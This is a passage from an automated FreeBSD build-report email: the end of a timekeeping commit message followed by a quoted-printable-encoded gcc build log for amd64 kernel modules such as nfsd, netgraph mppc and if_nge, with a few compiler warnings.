adjustment, but the commit is about the timekeeping code and the consumers were kept bug-to-bug compatible. Tested by:=09pho (as part of the bigger patch) Reviewed by:=09jhb (same) Discussed with:=09bde Sponsored by:=09The FreeBSD Foundation MFC after:=091 month X-Differential revision:=09https://reviews.freebsd.org/D7302 The end of the build log: [...truncated 281771 lines...] --- device_if.h --- awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/tools/makeobjops.awk /builds/Free= BSD_HEAD_amd64_gcc/sys/kern/device_if.m -h --- bus_if.h --- awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/tools/makeobjops.awk /builds/Free= BSD_HEAD_amd64_gcc/sys/kern/bus_if.m -h --- pci_if.h --- awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/tools/makeobjops.awk /builds/Free= BSD_HEAD_amd64_gcc/sys/dev/pci/pci_if.m -h --- if_nge.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.if_nge.o -MTif_nge.o= -mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-async= hronous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -W= all -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-proto= types -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -ffor= mat-extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unkn= own-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunu= sed-but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error= =3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wn= o-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -W= no-error=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fm= s-extensions --param inline-unit-growth=3D100 --param large-function-growth= =3D1000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/= nge/../../dev/nge/if_nge.c -o if_nge.o --- all_subdir_nfsd --- ctfconvert -L VERSION -g nfs_nfsdsocket.o --- nfs_nfsdstate.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.nfs_nfsdstate.o -MTn= fs_nfsdstate.o -mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-flo= at -fno-asynchronous-unwind-tables -ffreestanding -fwrapv -fstack-protecto= r -gdwarf-2 -Wall -Wredundant-decls -Wnested-externs -Wstrict-prototypes -= Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-poin= ter-sign -fformat-extensions -Wmissing-include-dirs -fdiagnostics-show-opt= ion -Wno-unknown-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -W= no-error=3Dunused-but-set-variable -Wno-error=3Daggressive-loop-optimizati= ons -Wno-error=3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error= =3Daddress -Wno-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error= =3Dattributes -Wno-error=3Dstrict-overflow -Wno-error=3Doverflow -finline= -limit=3D8000 -fms-extensions --param inline-unit-growth=3D100 --param larg= e-function-growth=3D1000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64= _gcc/sys/modules/nfsd/../../fs/nfsserver/nfs_nfsdstate.c -o nfs_nfsdstate.o --- all_subdir_netgraph --- --- all_subdir_netgraph/lmi --- ctfconvert -L VERSION -g ng_lmi.o --- ng_lmi.ko.full --- /usr/local/x86_64-freebsd/bin/ld -d -warn-common -r -d -o ng_lmi.ko.full ng= _lmi.o ctfmerge -L VERSION -g -o ng_lmi.ko.full ng_lmi.o :> export_syms awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/conf/kmod_syms.awk ng_lmi.ko.full= export_syms | xargs -J% /usr/local/x86_64-freebsd/bin/objcopy % ng_lmi.ko= .full --- ng_lmi.ko.debug --- /usr/local/x86_64-freebsd/bin/objcopy --only-keep-debug ng_lmi.ko.full ng_l= mi.ko.debug --- ng_lmi.ko --- /usr/local/x86_64-freebsd/bin/objcopy --strip-debug --add-gnu-debuglink=3Dn= g_lmi.ko.debug ng_lmi.ko.full ng_lmi.ko --- rijndael-api.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -c -O2 -frename-registers -pipe -fno-strict-a= liasing -g -nostdinc -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -I/builds/F= reeBSD_HEAD_amd64_gcc/sys/contrib/libfdt -D_KERNEL -DHAVE_KERNEL_OPTION_HEA= DERS -include opt_global.h -fno-omit-frame-pointer -mno-omit-leaf-frame-po= inter -MD -MF.depend.rijndael-api.o -MTrijndael-api.o -mcmodel=3Dkernel -m= no-red-zone -mno-mmx -mno-sse -msoft-float -fno-asynchronous-unwind-tables= -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-decls= -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith= -Winline -Wcast-qual -Wundef -Wno-pointer-sign -fformat-extensions -Wmis= sing-include-dirs -fdiagnostics-show-option -Wno-unknown-pragmas -Wno-err= or=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunused-but-set-variable = -Wno-error=3Daggressive-loop-optimizations -Wno-error=3Dmaybe-uninitialize= d -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wno-error=3Dcast-qual -= Wno-error=3Dsequence-point -Wno-error=3Dattributes -Wno-error=3Dstrict-ove= rflow -Wno-error=3Doverflow -fno-common -fms-extensions -finline-limit=3D8= 000 --param inline-unit-growth=3D100 --param large-function-growth=3D1000 = -std=3Diso9899:1999 /builds/FreeBSD_HEAD_amd64_gcc/sys/crypto/rijndael/ri= jndael-api.c --- modules-all --- --- all_subdir_netgraph/l2tp --- ctfconvert -L VERSION -g ng_l2tp.o --- ng_l2tp.ko.full --- /usr/local/x86_64-freebsd/bin/ld -d -warn-common -r -d -o ng_l2tp.ko.full n= g_l2tp.o ctfmerge -L VERSION -g -o ng_l2tp.ko.full ng_l2tp.o :> export_syms awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/conf/kmod_syms.awk ng_l2tp.ko.ful= l export_syms | xargs -J% /usr/local/x86_64-freebsd/bin/objcopy % ng_l2tp.= ko.full --- ng_l2tp.ko.debug --- /usr/local/x86_64-freebsd/bin/objcopy --only-keep-debug ng_l2tp.ko.full ng_= l2tp.ko.debug --- ng_l2tp.ko --- /usr/local/x86_64-freebsd/bin/objcopy --strip-debug --add-gnu-debuglink=3Dn= g_l2tp.ko.debug ng_l2tp.ko.full ng_l2tp.ko --- rijndael-api.o --- ctfconvert -L VERSION -g rijndael-api.o --- modules-all --- --- all_subdir_netgraph/mppc --- =3D=3D=3D> netgraph/mppc (all) --- all_subdir_nmdm --- =3D=3D=3D> nmdm (all) --- all_subdir_netgraph --- --- machine --- --- all_subdir_nmdm --- --- machine --- --- all_subdir_netgraph --- machine -> /builds/FreeBSD_HEAD_amd64_gcc/sys/amd64/include --- all_subdir_nmdm --- machine -> /builds/FreeBSD_HEAD_amd64_gcc/sys/amd64/include --- all_subdir_netgraph --- --- x86 --- --- all_subdir_nmdm --- --- x86 --- --- all_subdir_netgraph --- x86 -> /builds/FreeBSD_HEAD_amd64_gcc/sys/x86/include --- all_subdir_nmdm --- x86 -> /builds/FreeBSD_HEAD_amd64_gcc/sys/x86/include --- all_subdir_netgraph --- --- opt_netgraph.h --- ln -sf /builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys= /GENERIC/opt_netgraph.h opt_netgraph.h --- all_subdir_nmdm --- --- nmdm.o --- --- all_subdir_netgraph --- --- mppcc.o --- --- all_subdir_nmdm --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.nmdm.o -MTnmdm.o -mc= model=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-asynchron= ous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall = -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototype= s -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -fformat-= extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-= pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunused-= but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error=3Dm= aybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wno-er= ror=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -Wno-e= rror=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fms-ex= tensions --param inline-unit-growth=3D100 --param large-function-growth=3D1= 000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/nmdm= /../../dev/nmdm/nmdm.c -o nmdm.o --- all_subdir_netgraph --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.mppcc.o -MTmppcc.o -= mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-asynchr= onous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wal= l -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototy= pes -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -fforma= t-extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknow= n-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunuse= d-but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error= =3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wn= o-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -W= no-error=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fm= s-extensions --param inline-unit-growth=3D100 --param large-function-growth= =3D1000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/= netgraph/mppc/../../../net/mppcc.c -o mppcc.o /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph/mppc/../../../net/mppcc= .c: In function 'MPPC_Compress': /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph/mppc/../../../net/mppcc= .c:107:1: warning: inlining failed in call to 'putbits24': call is unlikely= and code size would grow [-Winline] putbits24(uint8_t *buf, uint32_t val, const uint32_t n, uint32_t *i, uint3= 2_t *l) ^ /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph/mppc/../../../net/mppcc= .c:260:6: warning: called from here [-Winline] putbits24(*dst, 0xff800|(len&0x3ff), 20, &olen, &l); ^ /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph/mppc/../../../net/mppcc= .c:107:1: warning: inlining failed in call to 'putbits24': call is unlikely= and code size would grow [-Winline] putbits24(uint8_t *buf, uint32_t val, const uint32_t n, uint32_t *i, uint3= 2_t *l) ^ /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph/mppc/../../../net/mppcc= .c:262:6: warning: called from here [-Winline] putbits24(*dst, 0x3ff000|(len&0x7ff), 22, &olen, &l); ^ --- all_subdir_nfsd --- /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/nfsd/../../fs/nfsserver/nfs_nfsd= state.c: In function 'nfsrv_openupdate': /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/nfsd/../../fs/nfsserver/nfs_nfsd= state.c:3228:25: warning: variable 'ownerstp' set but not used [-Wunused-bu= t-set-variable] struct nfsstate *stp, *ownerstp; ^ --- all_subdir_nmdm --- ctfconvert -L VERSION -g nmdm.o --- nmdm.ko.full --- /usr/local/x86_64-freebsd/bin/ld -d -warn-common -r -d -o nmdm.ko.full nmdm= .o ctfmerge -L VERSION -g -o nmdm.ko.full nmdm.o :> export_syms awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/conf/kmod_syms.awk nmdm.ko.full = export_syms | xargs -J% /usr/local/x86_64-freebsd/bin/objcopy % nmdm.ko.ful= l --- nmdm.ko.debug --- /usr/local/x86_64-freebsd/bin/objcopy --only-keep-debug nmdm.ko.full nmdm.k= o.debug --- nmdm.ko --- /usr/local/x86_64-freebsd/bin/objcopy --strip-debug --add-gnu-debuglink=3Dn= mdm.ko.debug nmdm.ko.full nmdm.ko --- all_subdir_netgraph --- ctfconvert -L VERSION -g mppcc.o --- mppcd.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.mppcd.o -MTmppcd.o -= mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-asynchr= onous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wal= l -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototy= pes -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -fforma= t-extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknow= n-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunuse= d-but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error= =3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wn= o-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -W= no-error=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fm= s-extensions --param inline-unit-growth=3D100 --param large-function-growth= =3D1000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/= netgraph/mppc/../../../net/mppcd.c -o mppcd.o --- all_subdir_nfsd --- --- nfs_nfsdsubs.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.nfs_nfsdsubs.o -MTnf= s_nfsdsubs.o -mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float= -fno-asynchronous-unwind-tables -ffreestanding -fwrapv -fstack-protector = -gdwarf-2 -Wall -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wm= issing-prototypes -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointe= r-sign -fformat-extensions -Wmissing-include-dirs -fdiagnostics-show-optio= n -Wno-unknown-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno= -error=3Dunused-but-set-variable -Wno-error=3Daggressive-loop-optimization= s -Wno-error=3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3D= address -Wno-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dat= tributes -Wno-error=3Dstrict-overflow -Wno-error=3Doverflow -finline-limi= t=3D8000 -fms-extensions --param inline-unit-growth=3D100 --param large-fun= ction-growth=3D1000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/= sys/modules/nfsd/../../fs/nfsserver/nfs_nfsdsubs.c -o nfs_nfsdsubs.o --- all_subdir_netgraph --- ctfconvert -L VERSION -g mppcd.o --- sha1.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.sha1.o -MTsha1.o -mc= model=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-asynchron= ous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall = -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototype= s -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -fformat-= extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-= pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunused-= but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error=3Dm= aybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wno-er= ror=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -Wno-e= rror=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fms-ex= tensions --param inline-unit-growth=3D100 --param large-function-growth=3D1= 000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netg= raph/mppc/../../../crypto/sha1.c -o sha1.o ctfconvert -L VERSION -g sha1.o --- ng_mppc.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.ng_mppc.o -MTng_mppc= .o -mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-asy= nchronous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 = -Wall -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-pro= totypes -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -ff= ormat-extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-un= known-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Du= nused-but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-err= or=3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -= Wno-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes = -Wno-error=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -= fms-extensions --param inline-unit-growth=3D100 --param large-function-grow= th=3D1000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/module= s/netgraph/mppc/../../../netgraph/ng_mppc.c -o ng_mppc.o ctfconvert -L VERSION -g ng_mppc.o --- ng_mppc.ko.full --- /usr/local/x86_64-freebsd/bin/ld -d -warn-common -r -d -o ng_mppc.ko.full n= g_mppc.o mppcc.o mppcd.o sha1.o ctfmerge -L VERSION -g -o ng_mppc.ko.full ng_mppc.o mppcc.o mppcd.o sha1.o :> export_syms awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/conf/kmod_syms.awk ng_mppc.ko.ful= l export_syms | xargs -J% /usr/local/x86_64-freebsd/bin/objcopy % ng_mppc.= ko.full --- ng_mppc.ko.debug --- /usr/local/x86_64-freebsd/bin/objcopy --only-keep-debug ng_mppc.ko.full ng_= mppc.ko.debug --- ng_mppc.ko --- /usr/local/x86_64-freebsd/bin/objcopy --strip-debug --add-gnu-debuglink=3Dn= g_mppc.ko.debug ng_mppc.ko.full ng_mppc.ko --- all_subdir_netgraph/nat --- =3D=3D=3D> netgraph/nat (all) --- all_subdir_nge --- ctfconvert -L VERSION -g if_nge.o --- all_subdir_netgraph --- --- machine --- machine -> /builds/FreeBSD_HEAD_amd64_gcc/sys/amd64/include --- x86 --- x86 -> /builds/FreeBSD_HEAD_amd64_gcc/sys/x86/include --- opt_netgraph.h --- ln -sf /builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys= /GENERIC/opt_netgraph.h opt_netgraph.h --- all_subdir_nge --- --- if_nge.ko.full --- /usr/local/x86_64-freebsd/bin/ld -d -warn-common -r -d -o if_nge.ko.full if= _nge.o --- all_subdir_netgraph --- --- ng_nat.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.ng_nat.o -MTng_nat.o= -mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-async= hronous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -W= all -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-proto= types -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -ffor= mat-extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unkn= own-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunu= sed-but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error= =3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wn= o-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -W= no-error=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fm= s-extensions --param inline-unit-growth=3D100 --param large-function-growth= =3D1000 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/= netgraph/nat/../../../netgraph/ng_nat.c -o ng_nat.o --- all_subdir_nge --- ctfmerge -L VERSION -g -o if_nge.ko.full if_nge.o :> export_syms awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/conf/kmod_syms.awk if_nge.ko.full= export_syms | xargs -J% /usr/local/x86_64-freebsd/bin/objcopy % if_nge.ko= .full --- if_nge.ko.debug --- /usr/local/x86_64-freebsd/bin/objcopy --only-keep-debug if_nge.ko.full if_n= ge.ko.debug --- if_nge.ko --- /usr/local/x86_64-freebsd/bin/objcopy --strip-debug --add-gnu-debuglink=3Di= f_nge.ko.debug if_nge.ko.full if_nge.ko --- 